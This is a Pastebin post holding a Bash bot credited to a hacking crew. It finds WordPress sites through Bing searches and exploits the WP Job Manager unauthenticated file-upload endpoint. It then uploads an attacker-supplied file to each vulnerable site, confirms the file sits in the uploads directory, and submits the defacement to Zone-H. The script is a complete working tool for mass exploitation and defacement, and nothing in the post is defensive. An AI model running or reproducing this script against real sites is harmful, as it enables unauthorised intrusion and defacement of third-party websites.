Advertisement
ccocot

Bot WP Job Manager

Jun 26th, 2017
1,271
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.15 KB | None | 0 0
  1. #!/bin/bash
  2. # Thank's To BC0DE.NET - NAONLAH.NET - BTM - IDX- Extreme Crew
  3. # SilentC0ders - Lestravo - Zombie-root - Boniw - KONSLET
  4. # CODE BY CCOCOT - ccocot@bc0de.net
  5.  
  6. CY='\e[36m'
  7. GR='\e[34m'
  8. OG='\e[92m'
  9. WH='\e[37m'
  10. RD='\e[31m'
  11. YL='\e[33m'
  12. BF='\e[34m'
  13. DF='\e[39m'
  14. OR='\e[33m'
  15. PP='\e[35m'
  16. B='\e[1m'
  17. CC='\e[0m'
  18.  
  19. nick="bc0de" ## NICK FOR SUBMIT Zone-H
  20. filee="bc0de.gif" ## FILE NAME
  21.  
  22. ngeget_site(){
  23.     local tgl=$(date +"%Y")
  24.     local bln=$(date +"%m")
  25.     local kimcil=`curl "http://www.bing.com/search?q=${2}&first=${1}1" -s`
  26.     local grab=$(echo $kimcil | grep -Po "(?<=<h2><a href=\")[^\"]*")
  27.     printf "===== PAGE ${1} =====\n\n"
  28.     for sites in $grab; do
  29.         IFS="/" read -r -a site <<< "$sites"
  30.         printf "${OG}${B}=>${CC} ${site[2]} - [${CY}${B}${sites}${CC}]\n"
  31.         local exploit=$(curl -s --connect-timeout 10 ${site[2]}/jm-ajax/upload_file/ -D -)
  32.         if [[ $exploit =~ "HTTP/1.1 200 OK" ]]; then
  33.             printf "${site[2]}/jm-ajax/upload_file/ ${OG}${B}200 OK${CC}\n"
  34.             if [[ $exploit =~ "{\"files\":" ]]; then
  35.                 printf  "${site[2]}/jm-ajax/upload_file/ ${OG}${B}VULN${CC}\n"
  36.                 local exploit_k=$(curl -s -k -F "file=@${4}" "${site[2]}/jm-ajax/upload_file/")
  37.                 printf "Exploit ...\n"
  38.                 local exploit_status=$(curl -s ${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} --head)
  39.                 if [[ $exploit_status =~ "200" ]]; then
  40.                     printf "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => ${OG}${B}FOUND${CC}\n"
  41.                     local zoneh=$(curl -s "http://www.zone-h.org/notify/single" -d "defacer=${3}&domain1=http://${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4}&hackmode=30&reason=1" | grep -c "<font color=\"red\">ERROR")
  42.                     if [[ $zoneh == 0 ]]; then
  43.                         printf "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => Zoneh [${3}] : ${B}${OG}OK${CC}\n\n"
  44.                         echo "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => Zoneh OK" >> output.txt
  45.                     else
  46.                         printf "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => Zoneh [${3}] : ${B}${RD}ERROR${CC}\n\n"
  47.                         echo "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => Error" >> output.txt
  48.                     fi 
  49.                 else
  50.                     printf "${site[2]}/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/${4} => ${RD}${B}NOT FOUND${CC}\n\n"
  51.                 fi
  52.             else
  53.                 printf  "${site[2]}/jm-ajax/upload_file/ ${RD}${B}NOT VULN${CC}\n\n"
  54.             fi
  55.         else
  56.             printf "${site[2]}/jm-ajax/upload_file/ ${RD}${B}Error${CC}\n\n"
  57.         fi
  58.     done
  59. }
  60.  
  61. cat << "EOF"
  62.      ____   ____ ___  ____  _____   _   _ _____ _____
  63.     | __ ) / ___/ _ \|  _ \| ____| | \ | | ____|_   _|
  64.     |  _ \| |  | | | | | | |  _|   |  \| |  _|   | |  
  65.     | |_) | |__| |_| | |_| | |___ _| |\  | |___  | |  
  66.     |____/ \____\___/|____/|_____(_)_| \_|_____| |_|
  67.  
  68.     BC0DE.NET - ccocot@Bc0de.net
  69.     [BOT] BING DORKER With Exploit WP JOB MANAGER Auto Submit Zone-H
  70.     BC0DE - NAONLAH
  71. EOF
  72. printf "\n===== GET INFO =====\n"
  73. printf "Nick : $nick\n"
  74. printf "File : $filee"
  75. printf "\n====================\n\n"
  76. printf "${B}Insert Keyword : ${CC}\n=> "; read Keyword
  77. printf "\n"
  78. for (( i = 0; i < 40; i++ )); do
  79.     ngeget_site $i $Keyword $nick $filee
  80. done
  81. wait
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement